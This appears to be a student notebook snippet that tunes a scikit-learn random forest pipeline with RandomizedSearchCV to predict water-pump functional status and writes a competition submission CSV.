Use scikit-learn for hyperparameter optimization with RandomizedSearchCV.
```
import category_encoders as ce
import numpy as np
from sklearn.feature_selection import f_regression, SelectKBest
from sklearn.impute import SimpleImputer
from sklearn.linear_model import Ridge
from sklearn.model_selection import cross_val_score
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor
from sklearn.model_selection import GridSearchCV, RandomizedSearchCV
encoder = ce.OneHotEncoder(use_cat_names=True)
x_train_encoded = encoder.fit_transform(X_train)
x_train_encoded.sample(10)
y_train.value_counts()
y_train_encoded = y_train.replace({'functional': 1, 'non functional': 2, 'functional needs repair':3})
y_train_encoded.value_counts()
pipeline = make_pipeline(
    SimpleImputer(),       # impute before scaling: StandardScaler can't handle NaNs
    StandardScaler(),
    RandomForestClassifier()
)
param_distributions = {
    'simpleimputer__strategy': ['mean', 'median'],
    # make_pipeline lowercases class names in parameter keys
    'randomforestclassifier__max_depth': [10, 20, 30, 40],
    'randomforestclassifier__min_samples_leaf': [1, 3, 5]
}
search = RandomizedSearchCV(
    pipeline,
    param_distributions=param_distributions,
    n_iter=30,
    cv=3,
    scoring='accuracy',    # classification metric, per the assignment
    verbose=10,
    return_train_score=True,
    n_jobs=-1
)
search.fit(x_train_encoded, y_train_encoded);
from sklearn.impute import SimpleImputer
pipeline = make_pipeline(
    ce.OneHotEncoder(use_cat_names=True),  # encode categoricals before imputing/scaling
    SimpleImputer(),
    StandardScaler(),
    RandomForestClassifier()
)
param_distributions = {
    'simpleimputer__strategy': ['mean', 'median'],
    'randomforestclassifier__max_depth': [10, 20, 30, 40],
    'randomforestclassifier__min_samples_leaf': [1, 3, 5]
}
search = RandomizedSearchCV(
    pipeline,
    param_distributions=param_distributions,
    n_iter=30,
    cv=3,
    scoring='accuracy',
    verbose=10,
    return_train_score=True,
    n_jobs=-1
)
search.fit(X_train, y_train);
from sklearn.metrics import classification_report, accuracy_score, precision_score, confusion_matrix
cv_result = cross_val_score(search,X_train,y_train, scoring = "accuracy")
search.fit(X_train, y_train)
print('Train Accuracy', search.score(X_train, y_train))
print('Validation Accuracy', search.score(X_val, y_val))
y_pred = search.predict(X_test)
submission = sample_submission.copy()
submission['status_group'] = y_pred
submission.to_csv('waterpumps-submission.csv', index=False)
!head 'waterpumps-submission.csv'
```